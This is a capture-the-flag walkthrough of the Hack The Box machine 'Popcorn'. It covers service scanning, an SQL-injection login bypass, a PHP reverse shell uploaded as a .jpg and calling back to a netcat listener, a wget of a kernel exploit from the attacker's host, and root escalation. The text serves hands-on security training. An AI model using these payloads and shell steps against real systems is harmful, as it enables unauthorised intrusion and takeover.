|Release:||15 Mar 2017|
Nmap Scan to enumerate services
$ sudo nmap -sC -Pn -sV -A -O 10.10.10.6 -o nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 13:52 EDT Nmap scan report for 10.10.10.6 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA) |_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA) 80/tcp open http Apache httpd 2.2.12 ((Ubuntu)) |_http-server-header: Apache/2.2.12 (Ubuntu) |_http-title: Site doesn't have a title (text/html). No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=5/4%OT=22%CT=1%CU=35952%PV=Y%DS=2%DC=T%G=Y%TM=5EB056A7 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=CA%GCD=2%ISR=CA%TI=Z%CI=Z%II=I%TS=8)SEQ(SP OS:=C9%GCD=1%ISR=C9%TI=Z%CI=Z%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54 OS:DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=16A0%W2=16A0% OS:W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW6%CC OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=1 OS:6A0%S=O%A=S+%F=AS%O=M54DST11NW6%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T= OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0 OS:%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R OS:=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1723/tcp) HOP RTT ADDRESS 1 273.37 ms 10.10.14.1 2 273.85 ms 10.10.10.6 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 46.94 seconds
Lets search for
OpenSSH 5.1p1 Debian 6ubuntu2 exploit in kali
$ searchsploit openssh
No exploit available for
OpenSSH 5.1p1 Debian 6ubuntu2
without wasting time, lets check what
port 80 has for us.
Open your favourite browser and type
Found nothing interesting, then lets use our
$ dirb http://10.10.10.6
http://10.10.10.6/torrents seems interesting.
Torrent Hoster, my attack surfaces are:
- Upload field
I would test for sql injection, because I don’t want to register.
- Click on Login,
- Enter username =
abc' or 'a'='a'-- aand password anything like pasword =
- Click Login and see if it works. Yess it absolutely works, now don’t ask how because its not a SQL injection class.
Moving forward, click on
My Torrents and see what is there
Kali Linux under filename
Well, it seems we can upload screenshots by clicking on
Edit this torrent. The application is built in PHP so we can upload php shell or can create our own exploit to get reverse shell. I prefer to use pentestmonkey.net shells.
You can directly download php shell by clicking on shell
You can also visit pentestmonkey to read how to use it or follow below walkthrough copied from
pentestmonkey.net. I hope it does not bother
Modify the source
Edit the following lines of php-reverse-shell.php:
$ip = '10.10.14.18'; // Remember enter `tun0` interface IP here $port = 8002; // CHANGE THIS
In order to catch shell
Start a TCP listener on a host machine and port that will be accessible by the web server. Use the same port here as you specified in the script (8002 in this example):
$ nc -v -n -l -p 8002
Upload and Run the script
Note We will use Burp Suite as an interception proxy tool to bypass any file upload restrictions
- Click on
Edit this torrent.
- Rename your php shell to
- Use below command to do same
$ mv php-reverse-shell.php exploit.php.jpg
- Turn Burp Suite
intercept onand in your browser, click
browseto upload your php shell
- Click submit and make changes in Burp Suite’s captured HTTP request as shown below
- Click forward in Burp Suite and wait for the browser to show the below message
Now wondering what next, then go back and notice the results in
dirb scan, we found one upload endpoint
http://10.10.10.6/torrent/upload/. Check it out if it contains our uploaded file.
http://10.10.10.6/torrent/upload/. Yessss, it contains our uploaded file
I know, you might be eager to click on it, but first make sure your
netcat listener is running and listening on
Click on the uploaded php file and see if we get a shell
Yess, we have got a shell and it looks like this
Its not interactive shell, so lets make it interactive(ITS OPTIONAL)
$ python -c 'import pty; pty.spawn("/bin/bash")'
$ ls -la
$ cd /home && ls
$ cd george
And we have our
$ cat user.txt
and submit your flag as fast as possible, because we are yet to pwn the
root and time is limited because time is money
$ cd /root
Changing directory to root says
permission denied, which means we need to escalate privileges.
I won’t write all jargon which I went through while pwning the root so jumping directly to how.
Linux kernel used is
Linux version 2.6.31-14-generic-pae. You can check kernel with below command
$ cat /proc/version
https://www.exploit-db.com/exploits/15704 and download the exploit. It matches our version of kernel
After downloading rename it in case you don’t like the original exploit name. I didn’t like so renamed it to
Now we need to transfer our payload into the pwned popcorn machine.
python -m SimpleHTTPServer 8003 in the directory where you downloaded the exploit.
Inside popcorn machine, run
$ cd /tmp. Remember we need to enumerate which directories our user has write permission, in this case
/tmp has. So we will download the exploit here.
$ wget 10.10.14.18:8003/exp2.c
We need to compile the program before running it.
$ gcc exp2.c -o exp3
cd /root and read the
Hence !!! :) :) ROOT pwned.
Note We have exploited the kernel to get root. But the official way is something else. When I was trying to pwn the root using the other way, I faced serious problem which I could not figure out how to solve. May be there is some change in the machine it self. You may refer to ippsec popcorn walk through in case you are eager to learn the other way too.
If you solve the machine using the ippsec way after this date, I would be happy to know how. You can reach out to me @r00trwx